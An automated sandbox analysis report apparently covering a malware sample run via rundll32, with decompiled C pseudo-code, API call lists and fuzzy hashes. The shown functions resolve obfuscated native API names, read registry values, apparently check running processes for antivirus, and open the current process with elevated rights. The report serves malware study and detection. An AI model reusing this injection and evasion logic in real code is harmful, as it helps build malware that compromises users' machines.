0x00794fc5
0x00794fcd
0x00794fd1
0x00794fd4
0x00000000
0x00794fd6
0x00794fd6
0x00794fdb
0x00794fe3
0x00794fe7
0x00794fea
0x00000000
0x00794fec
0x00794fec
0x00794ff1
0x00794ff9
0x00794ffd
0x00795000
0x00000000
0x00795002
0x00795008
0x0079500d
0x00795014
0x0079501b
0x0079501e
0x00000000
0x00795020
0x00795023
0x00795023
0x0079501e
0x00795000
0x00794fea
0x00794fd4
0x00794fbe
0x00794fa8
0x0079503d

APIs

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,007951C4,?,?,?,?,00000000,00000000), ref: 00794F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00794FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00794FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00794FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00794FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00794FF9

Part of subcall function 00794248: memset.NTDLL ref: 007942C7

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: d2f1b2b9c06736d0105dfa01922c23b5741b13e2fcd1e36b54056ffd90fdca03
Instruction ID: adc2ed94408770e9f07a954b80c2ea76f54570ee53a6c3055126e0b09f13680a
Opcode Fuzzy Hash: d2f1b2b9c06736d0105dfa01922c23b5741b13e2fcd1e36b54056ffd90fdca03
Instruction Fuzzy Hash: 0D215CB260065AAFDB11DF7DED44E6A77ECEB48344B008266E509C7211E73DE905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00791D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00791D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x79a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00794AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00797702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E007950CA(_a8);
						goto L29;
					}
					_t64 =  *0x79a2cc; // 0x5019c98
					_t16 = _t64 + 0xc; // 0x5019d8c
					_t65 = E00794AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d007990
						if(E00795F2A(_t97,  *_t33, _t91, _a8,  *0x79a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x79a2d4; // 0x487d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x79b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x79b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E00795927(_t69,  *0x79a384,  *0x79a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x79a2d4; // 0x487d5a8
									_t44 = _t71 + 0x79b86a; // 0x74666f53
									_t73 = E00794AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d007990
										E00791F7A( *_t47, _t91, _a8,  *0x79a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d007990
										E00791F7A( *_t49, _t91, _t99,  *0x79a380, _a16);
										E007950CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d007990
									E00791F7A( *_t40, _t91, _a8,  *0x79a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d007990
									E00791F7A( *_t43, _t91, _a8,  *0x79a380, _a16);
								}
								if( *_t101 != 0) {
									E007950CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d007990
					_t81 = E00796A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d007990
							E00795F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E007950CA(_t100);
						_t98 = _a16;
					}
					E007950CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E007977A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x79a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00791d57
0x00791d60
0x00791d67
0x00791d6c
0x00791dd9
0x00791ddf
0x00791de4
0x00791deb
0x00791df2
0x00791df5
0x00791f60
0x00791f67
0x00791f67
0x00791f6c
0x00791f6e
0x00791f6e
0x00791f77
0x00791f77
0x00791dfb
0x00791e07
0x00791f56
0x00791f59
0x00000000
0x00791f59
0x00791e0d
0x00791e12
0x00791e15
0x00791e1c
0x00791e1f
0x00791e68
0x00791e68
0x00791e7b
0x00791e85
0x00791e8d
0x00791e92
0x00791e9c
0x00791e9c
0x00791e94
0x00791e94
0x00791e94
0x00791e94
0x00791ebe
0x00791ec6
0x00791ef4
0x00791ef9
0x00791f00
0x00791f05
0x00791f09
0x00791f3b
0x00791f0b
0x00791f18
0x00791f1b
0x00791f2b
0x00791f2e
0x00791f34
0x00791f34
0x00791ec8
0x00791ed5
0x00791ed8
0x00791eea
0x00791eed
0x00791eed
0x00791f45
0x00791f51
0x00791f47
0x00791f4a
0x00791f4a
0x00791f45
0x00791ebe
0x00000000
0x00791e85
0x00791e2e
0x00791e31
0x00791e38
0x00791e3e
0x00791e41
0x00791e43
0x00791e4f
0x00791e52
0x00791e52
0x00791e58
0x00791e5d
0x00791e5d
0x00791e63
0x00000000
0x00791e63
0x00791d71
0x00000000
0x00791d98
0x00791d98
0x00791da4
0x00791db7
0x00791dbd
0x00791dc5
0x00000000
0x00791dc5

APIs

StrChrA.SHLWAPI(007930C2,0000005F,00000000,00000000,00000104), ref: 00791D8A
lstrcpy.KERNEL32(?,?), ref: 00791DB7

Part of subcall function 00794AA6: lstrlen.KERNEL32(?,00000000,05019C98,745EC740,007913D0,05019E9D,007955DE,007955DE,?,007955DE,?,63699BC3,E8FA7DD7,00000000), ref: 00794AAD
Part of subcall function 00794AA6: mbstowcs.NTDLL ref: 00794AD6
Part of subcall function 00794AA6: memset.NTDLL ref: 00794AE8

Part of subcall function 00791F7A: lstrlenW.KERNEL32(?,?,?,00791F20,3D007990,80000002,007930C2,00794106,74666F53,4D4C4B48,00794106,?,3D007990,80000002,007930C2,?), ref: 00791F9F

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

lstrcpy.KERNEL32(?,00000000), ref: 00791DD9

Strings

(, xrefs: 00791E3A
\, xrefs: 00791DBD

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 1e3faabab3ef430993e372804f6fca657f53b36501a0839d8c619054121235d0
Instruction ID: 9ce54adc1b033f92bedc51aa3b2e53ad5783922e820e3c70588aa7e169972d39
Opcode Fuzzy Hash: 1e3faabab3ef430993e372804f6fca657f53b36501a0839d8c619054121235d0
Instruction Fuzzy Hash: 5151663210160EFFDF229FA4ED45EAA3BBAFF08350F408515FA1592161D73DE9269B50

Uniqueness

Uniqueness Score: -1.00%

Function 007914A8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E007914A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x79a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E00796837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x79a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E007950CA(_v20);
											if(_v8 == 0) {
												_v8 = E007937FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E007925C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x007914a9
0x007914af
0x007914ba
0x007914ba
0x007914bc
0x00795aff
0x00795b02
0x00795b0b
0x00795b0e
0x00795b11
0x00795b19
0x00795c17
0x00795c22
0x00795c25
0x00795c27
0x00000000
0x00795c27
0x00795b1f
0x00795b22
0x00795c2a
0x00795c2a
0x00795b28
0x00795b2b
0x00795b2c
0x00795b2e
0x00795b37
0x00795c0e
0x00795b3d
0x00795b43
0x00795b4a
0x00795b4d
0x00795bfc
0x00795b53
0x00000000
0x00795b53
0x00795b53
0x00795b53
0x00795b53
0x00795b58
0x00795b5a
0x00795b5a
0x00795b67
0x00795b6f
0x00000000
0x00000000
0x00795b71
0x00795b7e
0x00795b84
0x00795b84
0x00795b87
0x00000000
0x00000000
0x00795b89
0x00795b94
0x00795ba8
0x00795bde
0x00795baa
0x00795baa
0x00795bb1
0x00795bb9
0x00000000
0x00795bbb
0x00795bbb
0x00795bc6
0x00795bc9
0x00795bd0
0x00000000
0x00795bd0
0x00795bc9
0x00795bb9
0x00795be1
0x00795be4
0x00795bec
0x00795bf7
0x00795bf7
0x00000000
0x00795bec
0x00795b91
0x00000000
0x00795bd3
0x00795bd3
0x00000000
0x00795bdc
0x00795c03
0x00795c03
0x00795c09
0x00795c09
0x00795b37
0x00795b22
0x00795c34
0x007914b1
0x007914b1
0x007914b8
0x007914c3
0x00000000
0x00000000
0x00000000
0x007914b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00797134,00000000,?), ref: 00795B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00797134,00000000,?,?), ref: 00795BBB

Part of subcall function 007925C7: wcstombs.NTDLL ref: 00792687

Strings

5}y, xrefs: 00795B2F

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID: 5}y
API String ID: 2344289193-1856581706
Opcode ID: 9b2b6969350b1b27c1a8daa336abe1c9e555301e1c66e45f4e2d991a2bf60898
Instruction ID: 8de52a67118ea687aaa8a6ef2b2b45b1209bad6869b1c9b1e9d51b195bdb32a3
Opcode Fuzzy Hash: 9b2b6969350b1b27c1a8daa336abe1c9e555301e1c66e45f4e2d991a2bf60898
Instruction Fuzzy Hash: 0D4153B190062AEFDF11DFA8E9859ADB7B8FF04344F20846EE502E7150E7389E41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0079513E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0079513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x79a2d4; // 0x487d5a8
						_t2 = _t9 + 0x79bdd4; // 0x73617661
						_push( &_v264);
						if( *0x79a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00795149
0x00795153
0x00795157
0x00795161
0x00795192
0x00795168
0x0079516d
0x0079517a
0x00795183
0x0079519a
0x00795185
0x0079518d
0x00000000
0x0079518d
0x0079519b
0x0079519c
0x00000000
0x0079519c
0x00000000
0x00795196
0x007951a2
0x007951a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0079514E
Process32First.KERNEL32(00000000,?), ref: 00795161
Process32Next.KERNEL32(00000000,?), ref: 0079518D
CloseHandle.KERNEL32(00000000), ref: 0079519C

Strings

0y, xrefs: 0079513E

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: 0y
API String ID: 420147892-313420791
Opcode ID: b7de8acd0e4dc6fb676ee9b6d624dffe217e49d08bc9be26e1476058937396cb
Instruction ID: 7b507252a5148b9fe915764a203391dc79fb9dcaa88483dfe51dfe9cf80ae61f
Opcode Fuzzy Hash: b7de8acd0e4dc6fb676ee9b6d624dffe217e49d08bc9be26e1476058937396cb
Instruction Fuzzy Hash: 52F09632241538BADF22A766BC49EEB77ADDBC5310F000162F955C2000E62C8D4787A1

Uniqueness

Uniqueness Score: -1.00%

Function 00792A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00792A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00796837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E007950CA(_v16);
								goto L37;
							}
							_t103 = E00796837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x79a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00792a2a
0x00792a31
0x00792a36
0x00792a39
0x00792a40
0x00792a43
0x00792a46
0x00792a4d
0x00792a50
0x00792ba4
0x00792ba6
0x00792ba8
0x00792bad
0x00792bad
0x00792a56
0x00792a59
0x00792a5c
0x00792a5e
0x00792a5e
0x00792a62
0x00000000
0x00000000
0x00792a66
0x00792a92
0x00792a97
0x00792a99
0x00792a99
0x00792a9c
0x00792a9f
0x00792a9f
0x00792aa1
0x00000000
0x00792a6c
0x00792a6e
0x00792a8d
0x00792a8d
0x00792aa4
0x00792aa4
0x00792aa5
0x00792aa5
0x00792aa8
0x00000000
0x00000000
0x00000000
0x00792aa8
0x00792a72
0x00792ab9
0x00792abd
0x00792b97
0x00792b99
0x00792b99
0x00792b9a
0x00792b9d
0x00000000
0x00792b9d
0x00792ad7
0x00792adb
0x00792b93
0x00000000
0x00792b93
0x00792ae1
0x00792ae4
0x00792ae8
0x00792aee
0x00792af1
0x00792b89
0x00792b89
0x00000000
0x00792b8f
0x00792afc
0x00792b05
0x00792b19
0x00792b20
0x00792b35
0x00792b3b
0x00792b43
0x00000000
0x00000000
0x00000000
0x00000000
0x00792b45
0x00792b45
0x00792b45
0x00792b4c
0x00792b54
0x00000000
0x00000000
0x00792b56
0x00792b5f
0x00000000
0x00000000
0x00000000
0x00792b61
0x00792b63
0x00792b66
0x00792b66
0x00792b69
0x00792b6d
0x00792b70
0x00792b76
0x00792b79
0x00792b80
0x00000000
0x00792afc
0x00792a77
0x00792a82
0x00792a85
0x00792a87
0x00792a87
0x00792a8a
0x00792a8c
0x00000000
0x00792a8c
0x00792a66
0x00792aac
0x00792ab1
0x00792ab3
0x00792ab3
0x00792ab6
0x00792ab6
0x00000000

APIs

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 00792B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 00792B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 00792B4C
lstrlen.KERNEL32(63699BC4), ref: 00792B70

Strings

, xrefs: 00792AB9

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 104a047b042bbb5a8ca1ebb2a0873f2992ce516a252ba3b5ae0406e4baf9ab39
Instruction ID: c2e0d25349833371384039a7315550c55ed0e7dd545fd79e8e5e90baa5c71833
Opcode Fuzzy Hash: 104a047b042bbb5a8ca1ebb2a0873f2992ce516a252ba3b5ae0406e4baf9ab39
Instruction Fuzzy Hash: D051C372A00108FFDF21EF99D884AADBBB6FF45314F14C05AEC159B212D7789A42CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6D47F6B9, Relevance: 7.5, APIs: 5, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6D47F6B9

Part of subcall function 6D47ECCC: RtlEncodePointer.NTDLL(00000000), ref: 6D47ECCF
Part of subcall function 6D47ECCC: __initp_misc_winsig.LIBCMT ref: 6D47ECEA

__mtterm.LIBCMT ref: 6D47F6C7
__initptd.LIBCMT ref: 6D47F70E
GetCurrentThreadId.KERNEL32 ref: 6D47F715

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: CurrentEncodePointerThread__init_pointers__initp_misc_winsig__initptd__mtterm
String ID:
API String ID: 4000030184-0
Opcode ID: 7dc48cd20faf01465451d03e29439486d8e10d27d1380457d4c393f56d76b3db
Instruction ID: 9339f7d88fb749b277262bf36e0cbe5804d45b217ac182875e7576d68f95598d
Opcode Fuzzy Hash: 7dc48cd20faf01465451d03e29439486d8e10d27d1380457d4c393f56d76b3db
Instruction Fuzzy Hash: 4AF0963265F6225EEB34BAB5AD01FE627A4DF01278B32162EE670D52E0FF51DC0145D4

Uniqueness

Uniqueness Score: -1.00%

Function 00794C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00794C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x79a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x79a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x79a2b0 = _t6;
				 *0x79a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x79a2ac = _t7;
				if(_t7 == 0) {
					 *0x79a2ac =  *0x79a2ac | 0xffffffff;
				}
				return 0;
			}

0x00794c23
0x00794c2b
0x00794c30
0x00000000
0x00794c7d
0x00794c32
0x00794c3a
0x00794c7a
0x00000000
0x00794c7a
0x00794c3c
0x00794c41
0x00794c53
0x00794c58
0x00794c5e
0x00794c66
0x00794c6b
0x00794c6d
0x00794c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00796B4E,?,?,00000001), ref: 00794C23
GetVersion.KERNEL32(?,00000001), ref: 00794C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00794C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00794C5E
GetLastError.KERNEL32(?,00000001), ref: 00794C7D

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 53d55beb806c2e87837b1ca31f32ec7ed257869efe7de9e3d668db11f9aa3f6b
Instruction ID: 4cc2489da1bee7470289020b1f5ff6eacb977ef0f549168b52e260789df1d771
Opcode Fuzzy Hash: 53d55beb806c2e87837b1ca31f32ec7ed257869efe7de9e3d668db11f9aa3f6b
Instruction Fuzzy Hash: EDF01D70646302AFEB209F69AD0AB153B64B749750F10C51BE656D52E0D77E4403CF2E

Uniqueness

Uniqueness Score: -1.00%

Function 00796A36, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00796A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t43 =  *0x79a0cc(_a8, _a12,  &_a12);
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4);
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00796837(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E007950CA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00794323(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x00796a42
0x00796a65
0x00796a75
0x00796a79
0x00796a91
0x00796a96
0x00796ade
0x00796a98
0x00796aa0
0x00796aa4
0x00796adb
0x00796aa6
0x00796ab8
0x00796abc
0x00796ad2
0x00796abe
0x00796ac1
0x00796ac3
0x00796ac8
0x00796acd
0x00796acd
0x00796ac8
0x00796abc
0x00796aa4
0x00796ae6
0x00796ae6
0x00796aed
0x00796af3
0x00796af3
0x00796a5b
0x00796a5f
0x00000000
0x00000000
0x00000000

APIs

